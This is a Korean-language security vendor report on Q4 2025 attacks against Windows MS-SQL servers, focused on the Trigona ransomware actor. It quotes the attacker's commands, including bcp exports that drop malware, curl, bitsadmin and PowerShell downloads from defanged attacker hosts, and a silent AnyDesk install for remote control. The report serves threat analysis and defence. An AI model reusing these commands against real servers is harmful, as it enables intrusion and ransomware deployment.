2025년 4분기 윈도우 데이터베이스 서버 대상 악성코드 통계 보고서
AhnLab SEcurity intelligence Center(ASEC)에서는 자사 ASD 인프라를 활용하여 윈도우 운영체제에 설치된 MS-SQL 서버 및 MySQL 서버를 대상으로 하는 공격들에 대한 대응 및 분류를 진행하고 있다. 본 문서에서는 2025년 4분기에 확인된 로그를 기반으로 공격 대상이 된 MS-SQL 및 MySQL 서버들의 피해 현황과 해당 서버들을 대상으로 발생한 공격들에 대한 통계를 다룬다. 그리고 각각의 공격에 사용된 악성코드들을 분류하여 세부적인 통계를 정리한다.
1. 윈도우 데이터베이스 서버 대상 공격 현황
다음은 2025년 4분기에 자사 ASD 로그를 통해 확인된 MS-SQL 서버 대상 공격에 대한 통계이다. 공격 대상이 되는 시스템들과 공격 수량 자체는 지속적으로 감소하다가 2025년 12월 다시 수량이 늘어난 것이 특징이다.
[그림 1] 2025년 4분기 MS-SQL 서버 대상 공격 현황
공격에 사용된 악성코드 유형 대부분은 공격자의 명령을 실행하는데 악용되는 CLRShell이나 권한 상승 기능을 담당하는 Potato 류의 악성코드들이다. 하지만 이외에도 감염 시스템의 자원을 이용해 암호 화폐를 채굴하는 CoinMiner, 이와 유사하게 현재 사용 가능한 인터넷 대역폭 일부를 외부에 공유하여 수익을 창출하는 Proxyware가 있다. 또한 Gh0stRAT이나 CobaltStrike, Meterpreter와 같은 백도어들을 설치하여 감염 시스템에 대한 제어를 탈취하는 사례들도 존재한다. 최근에는 이러한 백도어 외에도 AnyDesk나 RustDesk와 같은 정상 원격 제어 애플리케이션을 설치하는 경우도 확인되고 있다.
2. 2025년 4분기 공격 사례
2025년 4분기에는 MS-SQL 서버를 대상으로 하는 공격들 중에서 Trigona 공격자의 공격 사례를 다루었다. Trigona 공격자는 최근까지도 활동하고 있으며 과거 사례와 유사한 방식으로 공격을 수행하지만 새로운 유형의 악성코드 및 도구들이 사용되고 있다. Trigona 랜섬웨어 공격자는 외부에 노출되어 있으면서 계정 정보를 단순하게 설정하여 무차별 대입 공격이나 사전 공격에 취약한 MS-SQL 서버를 공격한다. 로그인에 성공한 후에는 CLR Shell을 이용해 추가 페이로드를 설치하며 이는 최근 사례에서도 동일하게 확인되고 있다. 다음은 MS-SQL 서버에 대한 제어를 획득한 이후 감염 시스템에 대한 정보를 획득하기 위해 공격자가 실행한 명령들이다.
> hostname
> whoami
> systeminfo
> tasklist
> wmic useraccount where (LocalAccount=True) get name
> powershell -Command “net user ladmin”
Trigona 공격자의 대표적인 특징 중 하나는 BCP(Bulk Copy Program)를 이용해 파일을 생성한다는 점이다. BCP 유틸리티인 bcp.exe는 MS-SQL 서버에서 대량의 외부 데이터를 가져오거나 내보내는데 사용되는 커맨드 라인 도구이다. 일반적으로 SQL 서버의 테이블에 저장된 대량의 데이터를 로컬의 파일로 저장하거나 로컬에 저장된 데이터 파일을 SQL 서버의 테이블에 내보내는데 사용된다.
공격자는 데이터베이스에 악성코드를 저장한 이후 BCP를 이용해 로컬에 파일로 생성하는 방식을 사용한다. 즉 공격자는 악성코드가 저장된 테이블 “uGnzBdZbsi”에서 다음과 같은 명령들을 이용해 로컬 경로로 악성코드를 내보냈으며 “FODsOZKgAU.txt”는 포맷 파일로서 포맷 정보가 포함되어 있다. 참고로 “uGnzBdZbsi”와 “FODsOZKgAU.txt”는 모두 2024년 공격 사례에서도 사용된 키워드이다.
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\spd.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\AD.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[사용자 이름]\music\L.bat” -T -f “C:\users\[사용자 이름]\music\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[사용자 이름]\music\pci2.exe” -T -f “C:\users\[사용자 이름]\music\FODsOZKgAU.txt”
[그림 2] BCP를 악용한 악성코드 생성
물론 BCP만 악용하는 것은 아니며 공격 사례들을 보면 Curl, Bitsadmin, 파워쉘 등 다양한 도구들을 이용해 악성코드를 다운로드하기도 하였다.
> curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe
> bitsadmin /transfer indirme /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[사용자 이름]\Videos\pci.exe
> powershell Invoke-WebRequest -Uri “hxxp://195.66.214[.]79/L.bat” -OutFile “c:\users\[사용자 이름]\music\L.bat”
공격자는 이전 공격 사례들과 동일하게 감염 시스템을 제어하기 위한 목적으로 AnyDesk를 악용하였다. 다음과 같은 명령들을 통해 %ALLUSERSPROFILE% 경로에 AnyDesk를 설치하였다.
> %SystemDrive%/programdata/AD.exe –install C:\programdata –silent
> %SystemDrive%/programdata/Anydesk-e7eba7df –get-id
이외에도 RDP를 이용하기도 하는데 다음과 같은 Batch 파일을 실행하여 “Remote99” 또는 “Ladmin”라는 이름의 RDP 접속이 가능한 사용자를 추가하였다. 해당 Batch 악성코드에는 이외에도 AnyDesk나 UseLogonCredential 레지스트리 키를 수정하는 기능이 함께 포함된 것이 특징이다.
[그림 3] 사용자 추가 기능을 담당하는 Batch 파일
새롭게 확인된 악성코드들 중에는 다운로더가 있다. Bat2Exe로 제작되었으며 실질적인 기능은 다음과 같은 Batch 파일을 생성하고 실행하는 것이다. 해당 Batch 스크립트 또한 “erp2″라는 이름의 계정을 생성하지만 외부에서 MSI 파일을 설치하는 추가적인 기능이 존재한다는 점이 차이점이다. 현재 기준 다운로드는 불가하지만 Teramind라는 이름의 RMM 도구를 설치하는 것으로 추정되며 공격자는 RDP, AnyDesk 외에도 Teramind를 악용해 감염 시스템을 제어하였을 것으로 보인다.
[그림 4] Teramind 다운로더 스크립트
이전 사례와의 대표적인 차이점이라고 한다면 다수의 스캐너 악성코드가 사용되고 있다는 점이다. 스캐너 악성코드는 Rust로 작성되었으며 실행 시 “ip-api.com”을 통해 획득한 IP 및 위치 정보를 포함한 감염 시스템의 정보를 C&C 서버에 전송한다. 이후 명령에 따라 스캐닝을 수행하는 데 그 대상은 다음과 같이 RDP 및 MS-SQL 서비스이다.
[그림 5] Rust 스캐너 악성코드의 문자열
참고로 공격자는 이러한 스캐닝 및 브루트 포싱 악성코드를 설치하기 이전에 테스트를 먼저 수행하는 것으로 보인다. 공격자가 설치한 여러 도구들 중에는 Ookla에서 제공하는 인터넷 속도 측정 도구인 SpeedTest를 설치하거나 직접 제작한 것으로 추정되는 StressTester를 사용하기도 하였다. StressTester는 Go 언어로 제작되었으며 GET, POST 요청뿐만 아니라 SQL 인젝션 요청에 대해서도 테스트 기능을 제공한다.
[그림 6] SQL Injection 관련 기능이 포함된 StressTester
